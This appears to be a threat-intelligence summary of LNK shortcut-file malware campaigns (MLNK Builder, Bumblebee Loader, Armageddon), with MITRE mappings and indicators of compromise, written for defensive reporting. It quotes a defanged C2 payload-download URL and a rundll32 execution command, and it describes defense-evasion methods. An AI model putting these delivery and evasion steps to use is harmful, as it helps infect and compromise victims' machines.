Threat Research

Shortcut-based (LNK) attacks delivering malicious code on the rise

Securonix

Resecurity reports attackers are increasingly using tools to generate malicious shortcut files (.LNK) for payload delivery, with MLNK Builder 4.2 adding AV evasion and icon masquerading. Campaigns by APT groups and cybercriminals—including Bumblebee Loader and Armageddon (UAC-0010)—employ LNK-based multi-format payloads, ISO attachments, and LOLBins to bypass defenses across EU targets. #MLNKBuilder #LNK #BumblebeeLoader #Armageddon #Oakboat #Qbot #IcedID #Emotet #Qakbot #TA578 #TA570

Keypoints

  • MLNK Builder 4.2 emphasizes AV evasion and icon masquerading to disguise LNK-based payloads.
  • LNK files can masquerade as legitimate Word, PDF, ZIP, JPG/PNG, MP3, AVI files and are used with ISO extensions to confuse protections.
  • PowerShell code embedded in LNK files is executed after user interaction, with attempts to bypass execution policies.
  • Campaigns (e.g., Bumblebee Loader, UAC-0010/Armageddon) target EU countries, using email and contact-form tactics to deliver ISO attachments.
  • The attacker toolkit allows payloads to download, decode (base64) and decrypt (AES) before execution, indicating multi-stage delivery.
  • Defenses are repeatedly bypassed (Windows Defender, SmartScreen, UAC, AMSI) and LOLBins are leveraged to enable stealthy execution.

MITRE Techniques

  • [T1023] Shortcut Modification – LNK-based payload delivery using shortcuts that masquerade and execute payloads. ‘The bad actors incorporate malicious code into LNK files (e.g. Powershell scenario) allowing the execution of the payload on the target machine.’
  • [T1059.001] PowerShell – Embedded PowerShell in LNK that will be executed after the user clicks the LNK file. ‘PowerShell code was embedded inside the file which will be executed after the victim clicks on the LNK file.’
  • [T1140] Deobfuscate/Decode Files or Information – Payload decoding and decryption steps. ‘decode the payload by using the base64 decoder, then use ASE decryption to decrypt the payload’
  • [T1105] Ingress Tool Transfer – Downloading payloads from external servers (C2). ‘Downloading the payload from “https://native-one[.]com:4200/client_auth”’
  • [T1218.011] Rundll32 – Executing DLLs via rundll32 as a proxy for payload run. ‘rundll32.exe scanned.dll,DllUnregisterServer’
  • [T1562.001] Impair Defenses – Bypass or weaken defenses (Windows Defender, SmartScreen, UAC). ‘The updated tool provides a rich arsenal of options… to evade Windows Defender, Smart Screen and UAC’
  • [T1036] Masquerading – Masquerading with icons from legitimate applications/formats to appear benign. ‘masquerading with icons from legitimately popular applications and file formats.’

Indicators of Compromise

  • [File Hashes] – fa15b97a6bb4d34e84dfb060b7114a5d, a4e45d28631ea2dd178f314f1362f213, and 2 more hashes
  • [File Names] – Datos-2504.lnk, namr.dll, and 2 more names
  • [Domains] – native-one[.]com, cert.gov.ua
  • [URLs] – https://cert.gov.ua/article/39086, https://native-one[.]com:4200/client_auth

Read more: https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint